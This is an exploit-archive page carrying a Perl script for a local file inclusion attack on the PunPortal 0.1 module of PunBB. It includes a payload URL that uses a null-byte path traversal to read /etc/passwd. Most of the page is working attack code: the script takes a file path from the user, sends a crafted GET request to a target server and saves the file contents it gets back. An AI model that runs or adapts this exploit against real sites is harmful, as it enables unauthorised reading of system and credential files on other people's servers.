exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

punportal-lfi.txt

punportal-lfi.txt
Posted Nov 20, 2008
Authored by StAkeR

PunPortal PunBB module version 0.1 local file inclusion exploit.

tags | exploit, local, file inclusion
SHA-256 | 63e5162517b423113437d76ce37e4881551e54e731e0b89b6f220564e426d437

punportal-lfi.txt

Change Mirror Download
#!/usr/bin/perl

=about

PunBB (PunPortal 0.1) Local File Inclusion Exploit
--------------------------------------------------
by athos - staker[at]hotmail[dot]it
download mod http://www.punres.org/download.php?id=1108
download cms http://punbb.org

register globals = 1
magic quotes gcp = 1



File (include/login.php)

1. <?php
2.
3. // Show login if not logged in
4. if($pun_user['is_guest'])
5. {
6. if(!isset($focus_element) || (isset($focus_element) && !in_array('login', $focus_element)))
7. {
8.
9. // Load the language files
10. require PUN_ROOT.'lang/'.$pun_user['language'].'/common.php';
11. require PUN_ROOT.'lang/'.$pun_user['language'].'/login.php';


$pun_user['is_guest'] isn't declared
$pun_user['language'] isn't declared

include/user/login.php?pun_user[is_guest]=a&pun_user[language]=../../etc/passwd%00

how to fix?use the latest version (2.0)

Usage: perl punbb.pl localhost/cms

=cut


use strict;
use warnings;
use IO::Socket;


my $html = undef;
my $site = $ARGV[0] or &help;
my @take = split /\//,$site;

my ($host,$path) = @take;

if($site =~ /http:\/\/(.+?)/i) {
print STDOUT "Invalid URL\n";
exit;
}

print STDOUT "Local File (ex: ../../etc/passwd)\n";
print STDOUT "Local File: ";

chomp(my $file = <STDIN>);

if(not defined($file)) {
print STDOUT "File Not Defined!\n";
exit;
}


my $evil = "/include/user/login.php?pun_user[is_guest]=a&pun_user[language]=";

my $sock = new IO::Socket::INET(
PeerAddr => $host,
PeerPort => 80,
Proto => 'tcp',
Timeout => 6,
) or die $!;

my $data = "GET /${path}/${evil}${file}%00 HTTP/1.1\r\n".
"Host: $host\r\n".
"User-Agent: Mozilla/4.5 [en] (Win95; U)\r\n".
"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n".
"Accept-Language: en-us,en;q=0.5\r\n".
"Accept-Encoding: gzip,deflate\r\n".
"Connection: close\r\n\r\n";

$sock->send($data);

while(<$sock>) {
$html .= $_;
}

if($html =~ /(No such file or directory|HTTP\/1.1 404 Not Found)/i) {
print STDOUT "Exploit Failed!\n";
exit;
}
else {
my $name = int(rand(999)).'.txt';

open(FILE,">",$name);
print FILE $html;
close(FILE);

print STDOUT "Exploit Successfully!\n";
print STDOUT "$name saved!\n";
exit;
}


sub help {
print STDOUT "PunBB (PunPortal 0.1) Local File Inclusion Exploit\n".
"by athos - staker[at]hotmail[dot]it\n".
"Usage: perl $0 [host/path]\n";
exit;
}


Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    0 Files
  • 16
    Apr 16th
    0 Files
  • 17
    Apr 17th
    0 Files
  • 18
    Apr 18th
    0 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close